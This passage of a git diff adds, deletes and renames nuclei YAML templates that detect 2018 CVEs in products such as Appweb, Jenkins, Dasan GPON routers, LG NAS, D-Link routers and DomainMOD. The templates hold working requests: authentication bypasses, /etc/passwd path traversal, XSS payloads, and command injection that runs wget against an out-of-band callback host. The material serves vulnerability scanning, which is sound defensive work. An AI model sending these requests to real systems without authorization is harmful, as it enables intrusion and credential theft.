https://security.paloaltonetworks.com/CVE-2018-8715 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2018-8715 + cwe-id: CWE-287 + tags: cve,cve2018,appweb,auth-bypass + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Authorization: Digest username=admin + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '' + part: body diff --git a/nuclei-templates/CVE-2018/CVE-2018-8719.yaml b/nuclei-templates/CVE-2018/CVE-2018-8719.yaml deleted file mode 100644 index 022985a814..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-8719.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2018-8719 - -info: - name: WordPress Plugin WP Security Audit Log 3.1.1 - Information Disclosure - author: LogicalHunter - severity: medium - description: Access to wp-content/uploads/wp-security-audit-log/* files is not restricted. For example, these files are indexed by Google and allows for attackers to possibly find sensitive information - reference: - - https://www.exploit-db.com/exploits/44371 - - https://vuldb.com/?id.115817 - - https://www.cvedetails.com/cve/CVE-2018-8719/ - tags: wordpress,wp-plugin,cve,cve2018,exposure - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 - cve-id: CVE-2018-8719 - cwe-id: CWE-532 - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/uploads/wp-security-audit-log/failed-logins/" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "[TXT]" - - ".log" - - "Index of" - condition: and diff --git a/nuclei-templates/CVE-2018/CVE-2018-9161.yaml b/nuclei-templates/CVE-2018/CVE-2018-9161.yaml deleted file mode 100644 index 620cecf348..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-9161.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2018-9161 - -info: - name: PrismaWEB - Credentials Disclosure - author: gy741 - severity: critical - description: PrismaWEB is susceptible to credential disclosure. The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script. - remediation: | - Ensure that sensitive credentials are properly protected and not exposed in the application's source code or configuration files. - reference: - - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php - - https://nvd.nist.gov/vuln/detail/CVE-2018-9161 - - https://www.exploit-db.com/exploits/44276/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2018-9161 - cwe-id: CWE-798 - epss-score: 0.26342 - epss-percentile: 0.96265 - cpe: cpe:2.3:a:prismaindustriale:checkweigher_prismaweb:1.21:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: prismaindustriale - product: checkweigher_prismaweb - tags: cve,cve2018,prismaweb,exposure,edb - -http: - - method: GET - path: - - "{{BaseURL}}/user/scripts/login_par.js" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'txtChkUser' - - 'txtChkPassword' - condition: and - - - type: status - status: - - 200 - -# digest: 490a0046304402200fc2f92b9a58923299c356c4dcfb81b373807e77a199367f5a701d9183466a8802207c6b6be3b4582d02d44da4346e544fb8f283dd92456425d08f8f2fe9ae0096c6:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/CVE-2018/CVE-2018-9205.yaml b/nuclei-templates/CVE-2018/CVE-2018-9205.yaml deleted file mode 100644 index 5f152b9806..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-9205.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2018-9205 - -info: - name: Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion - author: daffainfo - severity: high - description: In avatar_uploader v7.x-1.0-beta8 the view.php program doesn't restrict file paths, allowing unauthenticated users to retrieve arbitrary files. - reference: - - https://www.exploit-db.com/exploits/44501 - - https://nvd.nist.gov/vuln/detail/CVE-2018-9205 - - https://www.drupal.org/project/avatar_uploader/issues/2957966 - - https://www.drupal.org/project/avatar_uploader - remediation: Upgrade to the latest version of avatar_uploader. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-9205 - cwe-id: CWE-22 - tags: cve,cve2018,lfi,drupal - -requests: - - method: GET - path: - - "{{BaseURL}}/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by cs on 2022/02/25 diff --git a/nuclei-templates/CVE-2018/CVE-2018-9995.yaml b/nuclei-templates/CVE-2018/CVE-2018-9995.yaml new file mode 100644 index 0000000000..69fef29cea --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-9995.yaml @@ -0,0 +1,42 @@ +id: CVE-2018-9995 + +info: + name: TBK DVR4104/DVR4216 Devices - Authentication Bypass + author: princechaddha + severity: critical + description: | + TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and + MDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypass + authentication via a "Cookie: uid=admin" header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides credentials within JSON data in a response. + reference: + - https://www.exploit-db.com/exploits/44577/ + - http://misteralfa-hack.blogspot.cl/2018/04/tbk-vision-dvr-login-bypass.html + - http://misteralfa-hack.blogspot.cl/2018/04/update-dvr-login-bypass-cve-2018-9995.html + - https://www.bleepingcomputer.com/news/security/new-hacking-tool-lets-users-access-a-bunch-of-dvrs-and-their-video-feeds/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-9995 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-9995 + tags: cve,cve2018,auth-bypass,tbk + +requests: + - method: GET + path: + - "{{BaseURL}}/device.rsp?opt=user&cmd=list" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "\"uid\":" + - "\"pwd\":" + - "\"view\":" + - "playback" + condition: and + + - type: status + status: + - 200 +# Enhanced by mp on 2022/05/16 diff --git "a/nuclei-templates/CVE-2018/CVE-2018\342\200\22314064(1).yaml" "b/nuclei-templates/CVE-2018/CVE-2018\342\200\22314064(1).yaml" deleted file mode 100644 index d07fc4a0b2..0000000000 --- "a/nuclei-templates/CVE-2018/CVE-2018\342\200\22314064(1).yaml" +++ /dev/null @@ -1,21 +0,0 @@ -id: cve-2018-14064 -info: - name: VelotiSmart Wifi - Directory Traversal - author: 0x_Akoko - severity: high - reference: | - - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac - - https://www.exploit-db.com/exploits/45030 - tags: velotismart,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-0101.yaml b/nuclei-templates/CVE-2018/cve-2018-0101.yaml deleted file mode 100644 index c737a701c8..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-0101.yaml +++ /dev/null @@ -1,52 +0,0 @@ -id: cve-2018-0101 - -info: - name: Cisco ASA Denial-of-Service # Leads to RCE - author: dwisiswant0 - severity: critical - reference: https://www.exploit-db.com/exploits/43986 - description: | - A vulnerability in the XML parser of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated, - remote attacker to cause a reload of the affected system or to remotely execute code. It was also possible that - the ASA could stop processing incoming Virtual Private Network (VPN) authentication requests due to a low memory condition. - tags: cve,cve2018,cisco,dos,rce - -requests: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Content-Type: application/x-www-form-urlencoded - X-Aggregate-Auth: 1 - X-Transcend-Version: 1 - Accept-Encoding: identity - X-AnyConnect-Platform: linux-64 - X-Support-HTTP-Auth: false - X-Pad: 0000000000000000000000000000000000000000 - - - - A - - - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - "status_code_1 == 200" - - - type: dsl - dsl: - - "status_code_2 == 500" - - "status_code_2 == 501" - - "status_code_2 == 502" - - "status_code_2 == 503" - - "status_code_2 == 504" - condition: or \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-1000226.yaml b/nuclei-templates/CVE-2018/cve-2018-1000226.yaml deleted file mode 100644 index c070e810a9..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-1000226.yaml +++ /dev/null @@ -1,60 +0,0 @@ -id: CVE-2018-1000226 - -info: - name: Cobbler versions 2.6.11+, (2.0.0+ or older versions) - Authentication Bypass - author: c-sh0 - severity: critical - reference: - - https://github.com/cobbler/cobbler/issues/1916 - - https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-1000226 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2018-1000226 - cwe-id: CWE-732 - tags: cve,cve2018,cobbler,auth-bypass - -requests: - - raw: - - | - POST {{BaseURL}}/cobbler_api HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/xml - - - - _CobblerXMLRPCInterface__make_token - - - - cobbler - - - - - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - "Content-Type: text/xml" - - - type: word - part: body - words: - - "" - - - type: dsl - dsl: - - "!contains(tolower(body), 'faultCode')" - - - type: regex - part: body - regex: - - "(.*[a-zA-Z0-9].+==)" diff --git a/nuclei-templates/CVE-2018/cve-2018-1000533.yaml b/nuclei-templates/CVE-2018/cve-2018-1000533.yaml deleted file mode 100644 index 7532d878ce..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-1000533.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2018-1000533 - -info: - name: GitList < 0.6.0 RCE - author: pikpikcu - severity: critical - description: klaussilveira GitList version <= 0.6 contains a Passing incorrectly sanitized input to system function vulnerability in `searchTree` function that can result in Execute any code as PHP user. - reference: https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533 - tags: rce,git,cve,cve2018,gitlist - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2018-1000533 - cwe-id: CWE-20 - -requests: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - - - | - POST /{{path}}/tree/a/search HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - query=--open-files-in-pager=cat%20/etc/passwd - - extractors: - - type: regex - name: path - group: 1 - internal: true - part: body - regex: - - '(.*?)' - - matchers: - - type: word - words: - - "root:/root:/bin/bash" - part: body diff --git a/nuclei-templates/CVE-2018/cve-2018-1000856.yaml b/nuclei-templates/CVE-2018/cve-2018-1000856.yaml new file mode 100644 index 0000000000..dcc69a343c --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-1000856.yaml @@ -0,0 +1,69 @@ +id: CVE-2018-1000856 + +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.11.01 is vulnerable to cross-site scripting via the segments/add.php Segment Name field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. + reference: + - https://github.com/domainmod/domainmod/issues/80 + - https://nvd.nist.gov/vuln/detail/CVE-2018-1000856 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-1000856 + cwe-id: CWE-79 + epss-score: 0.00092 + epss-percentile: 0.38207 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 3 + vendor: domainmod + product: domainmod + tags: cve2018,cve,domainmod,xss,authenticated + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /segments/add.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=test.com&new_description=test&new_notes=test + - | + GET /segments/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + host-redirects: true + max-redirects: 3 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 4a0a0047304502205e60ba8ac7b7b68b9dcb58a31e4b4083007aa34e42c8dbc2d4750a2e0242c4ef022100b9eb8ca7486f72fde65b1b901b782329f828735d4b45ec7c80b345137845b021:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-1000861.yaml b/nuclei-templates/CVE-2018/cve-2018-1000861.yaml new file mode 100644 index 0000000000..df0c630278 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-1000861.yaml @@ -0,0 +1,31 @@ +id: CVE-2018-1000861 + +info: + name: Jenkins 2.138 Remote Command Execution + author: dhiyaneshDK,pikpikcu + severity: critical + reference: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861 + tags: cve,cve2018,jenkin,rce,jenkins + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-1000861 + cwe-id: CWE-502 + description: "A code execution vulnerability exists in the Stapler web framework used by Jenkins 2.153 and earlier, LTS 2.138.3 and earlier in stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way." + +requests: + - method: GET + path: + - '{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;' + + matchers-condition: and + matchers: + + - type: word + words: + - "package#vulntest" + part: body + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-10230.yaml b/nuclei-templates/CVE-2018/cve-2018-10230.yaml deleted file mode 100644 index feadcb357a..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-10230.yaml +++ /dev/null @@ -1,53 +0,0 @@ -id: CVE-2018-10230 - -info: - name: Zend Server <9.13 - Cross-Site Scripting - author: marcos_iaf - severity: medium - description: | - Zend Server before version 9.13 is vulnerable to cross-site scripting via the debug_host parameter. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. - remediation: | - Upgrade Zend Server to version 9.13 or later to mitigate this vulnerability. - reference: - - https://www.synacktiv.com/ressources/zend_server_9_1_3_xss.pdf - - https://www.zend.com/en/products/server/release-notes - - https://nvd.nist.gov/vuln/detail/CVE-2018-10230 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-10230 - cwe-id: CWE-79 - epss-score: 0.00122 - epss-percentile: 0.46318 - cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: zend - product: zend_server - tags: cve,cve2018,xss,zend - -http: - - method: GET - path: - - "{{BaseURL}}/index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - "is not allowed to open debug sessions" - condition: and - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 -# digest: 490a0046304402201423fd900a1cd2dcf52028722c5f7a43f8b6d20d5a5b65d58f59ffed42a8f6ff02205da25d220a25b5faef2f03778f2b749c7a385c901429baf839f1815fc1681d28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-10562.yaml b/nuclei-templates/CVE-2018/cve-2018-10562.yaml deleted file mode 100644 index b65eb8717e..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-10562.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2018-10562 - -info: - name: Dasan GPON Devices - Remote Code Execution (Unauthenticated) - author: gy741 - severity: critical - description: An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output. - reference: - - https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router - - https://github.com/f3d0x0/GPON/blob/master/gpon_rce.py - - https://nvd.nist.gov/vuln/detail/CVE-2018-10562 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N - cvss-score: 9.80 - cve-id: CVE-2018-10562 - cwe-id: CWE-78 - tags: cve,cve2018,dasan,gpon,rce,oast - -requests: - - raw: - - | - POST /GponForm/diag_Form?images/ HTTP/1.1 - Host: {{Hostname}} - - XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox wget http://{{interactsh-url}}`;busybox wget http://{{interactsh-url}}&ipv=0 - - - | - POST /GponForm/diag_Form?images/ HTTP/1.1 - Host: {{Hostname}} - - XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://{{interactsh-url}}`;wget http://{{interactsh-url}}&ipv=0 - - stop-at-first-match: true - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" diff --git a/nuclei-templates/CVE-2018/cve-2018-10818.yaml b/nuclei-templates/CVE-2018/cve-2018-10818.yaml deleted file mode 100644 index 2dc224d38d..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-10818.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2018-10818 - -info: - name: LG NAS Devices - Remote Code Execution (Unauthenticated) - author: gy741 - severity: critical - description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter. - reference: - - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/ - - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247 - tags: cve,cve2018,lg-nas,rce,oast,injection - -requests: - - raw: - - | - POST /system/sharedir.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - &uid=10; wget http://{{interactsh-url}} - - - | - POST /en/php/usb_sync.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - &act=sync&task_number=1;wget http://{{interactsh-url}} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-10823.yaml b/nuclei-templates/CVE-2018/cve-2018-10823.yaml new file mode 100644 index 0000000000..81ca5b0d08 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-10823.yaml @@ -0,0 +1,32 @@ +id: CVE-2018-10823 + +info: + name: D-Link Routers - Command Injection + author: wisnupramoedya + severity: high + description: An issue was discovered on D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 devices. An authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals. + reference: + - https://www.exploit-db.com/exploits/45676 + - https://nvd.nist.gov/vuln/detail/CVE-2018-10823 + tags: cve,cve2018,rce,iot,dlink,router + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2018-10823 + cwe-id: CWE-78 + +requests: + - method: GET + path: + - "{{BaseURL}}/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-11409.yaml b/nuclei-templates/CVE-2018/cve-2018-11409.yaml deleted file mode 100644 index 888187304c..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-11409.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2018-11409 - -info: - name: Splunk Sensitive Information Disclosure - author: harshbothra_ - severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11409 - tags: cve,cve2018,splunk - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 - cve-id: CVE-2018-11409 - cwe-id: CWE-200 - description: "Splunk through 7.0.1 allows information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key." - -requests: - - method: GET - path: - - '{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json' - - '{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - licenseKeys diff --git a/nuclei-templates/CVE-2018/CVE-2018-11784.yaml b/nuclei-templates/CVE-2018/cve-2018-11784.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-11784.yaml rename to nuclei-templates/CVE-2018/cve-2018-11784.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-12031.yaml b/nuclei-templates/CVE-2018/cve-2018-12031.yaml new file mode 100644 index 0000000000..f5ecf6d832 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-12031.yaml @@ -0,0 +1,35 @@ +id: CVE-2018-12031 + +info: + name: Eaton Intelligent Power Manager 1.6 - Directory Traversal + author: daffainfo + severity: critical + description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution. + reference: + - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion + - https://nvd.nist.gov/vuln/detail/CVE-2018-12031 + - https://www.exploit-db.com/exploits/48614 + tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-12031 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd" + - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0" + - "\\[(font|extension|file)s\\]" + condition: or + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-12054.yaml b/nuclei-templates/CVE-2018/cve-2018-12054.yaml deleted file mode 100644 index 7daf35a964..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-12054.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2018-12054 - -info: - name: Schools Alert Management Script - Arbitrary File Read - author: wisnupramoedya - severity: high - description: Arbitrary File Read exists in PHP Scripts Mall Schools Alert Management Script via the f parameter in img.php, aka absolute path traversal. - reference: - - https://www.exploit-db.com/exploits/44874 - - https://www.cvedetails.com/cve/CVE-2018-12054 - tags: cve,cve2018,lfi - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2018-12054 - cwe-id: CWE-22 - -requests: - - method: GET - path: - - "{{BaseURL}}/img.php?f=/./etc/./passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-12095.yaml b/nuclei-templates/CVE-2018/cve-2018-12095.yaml deleted file mode 100644 index 202b897b33..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-12095.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2018-12095 - -info: - name: OEcms 3.1 - Cross-Site Scripting - author: LogicalHunter - severity: medium - description: A Reflected Cross-Site Scripting web vulnerability has been discovered in the OEcms v3.1 web-application. The vulnerability is located in the mod parameter of info.php. - reference: - - https://www.exploit-db.com/exploits/44895 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095 - - https://cxsecurity.com/issue/WLB-2018060092 - tags: cve,cve2018,xss - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.40 - cve-id: CVE-2018-12095 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - '{{BaseURL}}/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-12296.yaml b/nuclei-templates/CVE-2018/cve-2018-12296.yaml new file mode 100644 index 0000000000..faa7cc7f06 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-12296.yaml @@ -0,0 +1,37 @@ +id: CVE-2018-12296 +info: + name: Seagate NAS OS 4.3.15.1 - Server Information Disclosure + author: princechaddha + severity: high + description: Insufficient access control in /api/external/7.0/system.System.get_infos in Seagate NAS OS version 4.3.15.1 allows attackers to obtain information about the NAS without authentication via empty POST requests. + reference: + - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170 + - https://nvd.nist.gov/vuln/detail/CVE-2018-12296 + tags: cve,cve2018,seagate,nasos,disclosure,unauth + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-12296 + cwe-id: CWE-732 + +requests: + - raw: + - | + POST /api/external/7.0/system.System.get_infos HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}} + + matchers: + - type: word + part: body + words: + - '"version":' + - '"serial_number":' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: + - '"version": "([0-9.]+)"' diff --git a/nuclei-templates/CVE-2018/cve-2018-12300.yaml b/nuclei-templates/CVE-2018/cve-2018-12300.yaml new file mode 100644 index 0000000000..aac189bfd8 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-12300.yaml @@ -0,0 +1,28 @@ +id: CVE-2018-12300 + +info: + name: Seagate NAS OS 4.3.15.1 - Open redirect + author: 0x_Akoko + severity: medium + description: Arbitrary Redirect in echo-server.html in Seagate NAS OS version 4.3.15.1 allows attackers to disclose information in the Referer header via the 'state' URL parameter. + reference: + - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170 + - https://www.cvedetails.com/cve/CVE-2018-12300 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-12300 + cwe-id: CWE-601 + tags: cve,cve2018,redirect,seagate,nasos + +requests: + - method: GET + + path: + - '{{BaseURL}}/echo-server.html?code=test&state=http://www.attacker.com#' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/nuclei-templates/CVE-2018/cve-2018-1247.yaml b/nuclei-templates/CVE-2018/cve-2018-1247.yaml new file mode 100644 index 0000000000..e522302ccb --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-1247.yaml @@ -0,0 +1,22 @@ +id: CVE-2018-1247 + +info: + name: RSA Authentication Manager XSS + author: madrobot + severity: medium + +requests: + - method: GET + path: + - "{{BaseURL}}/IMS-AA-IDP/common/scripts/iua/pmfso.swf?sendUrl=/&gotoUrlLocal=javascript:alert(1337)//" + + matchers-condition: and + matchers: + - type: word + words: + - "application/x-shockwave-flash" + part: header + - type: word + words: + - "javascript:alert(1337)" + part: body diff --git a/nuclei-templates/CVE-2018/cve-2018-12613.yaml b/nuclei-templates/CVE-2018/cve-2018-12613.yaml new file mode 100644 index 0000000000..40bfe42ba7 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-12613.yaml @@ -0,0 +1,31 @@ +id: CVE-2018-12613 + +info: + name: PhpMyAdmin 4.8.1 Remote File Inclusion + author: pikpikcu + severity: high + reference: 